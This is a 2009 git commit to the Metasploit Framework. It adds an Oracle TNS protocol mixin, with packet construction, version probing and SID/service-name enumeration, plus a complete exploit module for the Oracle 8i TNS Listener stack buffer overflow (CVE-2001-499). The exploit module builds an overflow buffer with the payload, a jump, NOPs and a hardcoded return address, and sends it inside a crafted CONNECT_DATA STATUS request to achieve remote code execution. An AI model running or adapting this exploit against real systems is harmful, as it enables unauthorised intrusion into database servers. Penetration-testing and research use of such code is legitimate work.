added tns mixin to support oracle8i listener overflow and other tns

related stuff.


git-svn-id: file:///home/svn/framework3/trunk@6082 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2009-01-07 03:07:01 +00:00
parent 41fbd5500e
commit ee86b19834
3 changed files with 207 additions and 0 deletions

View File

@ -238,6 +238,7 @@ class Exploit < Msf::Module
require 'msf/core/exploit/imap'
require 'msf/core/exploit/smtp_deliver'
require 'msf/core/exploit/pop2'
require 'msf/core/exploit/tns'
# Networks
require 'msf/core/exploit/lorcon'

113
lib/msf/core/exploit/tns.rb Normal file
View File

@ -0,0 +1,113 @@
require 'msf/core'
module Msf
###
#
# This module exposes methods for querying a remote TNS service
#
###
module Exploit::Remote::TNS
include Exploit::Remote::Tcp
#
# Creates an instance of a TNS exploit module.
#
def initialize(info = {})
super
# Register the options that all TNS exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(1521),
], Msf::Exploit::Remote::TNS)
end
def tns_packet(connect_data)
packet_length = [58 + connect_data.length].pack('n')
# Packet length
pkt = packet_length
# Checksum
pkt << "\x00\x00"
# Packet Type: Connect(1)
pkt << "\x01"
# Reserved
pkt << "\x00"
# Header Checksum
pkt << "\x00\x00"
# Version
pkt << "\x01\x36"
# Version (Compatible)
pkt << "\x01\x2C"
pkt << "\x00\x00\x08\x00"
pkt << "\x7F\xFF"
pkt << "\x7F\x08"
pkt << "\x00\x00"
pkt << "\x00\x01"
pkt << [connect_data.length].pack('n')
pkt << "\x00\x3A"
pkt << "\x00\x00\x00\x00"
pkt << "\x00\x00\x00\x00"
pkt << "\x00"
pkt << "\x00"
pkt << "\x00\x00\x00\x00"
# Unique Connection ID
pkt << "\x00\x00\x34\xE6\x00\x00\x00\x01"
# Connect Data
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
pkt << connect_data
return pkt
end
def get_version
connect_data = "(CONNECT_DATA=(COMMAND=VERSION))"
pkt = tns_packet(connect_data)
sock.put(pkt)
sock.get_once
data = sock.get_once(-1,1)
if ( data and data =~ /\\*.TNSLSNR for (.*)/ )
return print_status("Host #{rhost} is running: " + $1)
else
return print_error("Unable to determine version info for #{rhost}...")
end
end
def get_sid
connect_data = "(CONNECT_DATA=(COMMAND=STATUS))"
pkt = tns_packet(connect_data)
sock.put(pkt)
sleep(1)
data = sock.get_once
if ( data =~ /ERROR_STACK/ )
print_error("TNS listener protected for #{rhost}...")
else
sid = data.scan(/INSTANCE_NAME=(\w+)/)
sid.uniq.each do |s|
print_status("Identified SID for #{rhost}: #{s}")
end
end
service_name = data.scan(/SERVICE_NAME=(\w+)/)
service_name.each do |s|
print_status("Identified SERVICE_NAME for #{rhost}: #{s}")
end
end
end
end

View File

@ -0,0 +1,93 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::TNS
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 8i TNS Listener Buffer Overflow.',
'Description' => %q{
This module exploits a stack overflow in Oracle 8i. When
sending a specially crafted packet to the TNS service, an
attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2001-499' ],
[ 'BID', '2941' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)', { 'Ret' => 0x60a1e154 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 28 2001'))
register_options([Opt::RPORT(1521)], self.class)
end
def check
connect
version = "(CONNECT_DATA=(COMMAND=VERSION))"
pkt = tns_packet(version)
sock.put(pkt)
sock.get_once
res = sock.get_once(-1, 1)
disconnect
if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
buff = rand_text_alpha_upper(6383 - payload.encoded.length) + payload.encoded
buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966)
sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))"
pkt = tns_packet(sploit)
print_status("Trying target #{target.name}...")
sock.put(pkt)
handler
disconnect
end
end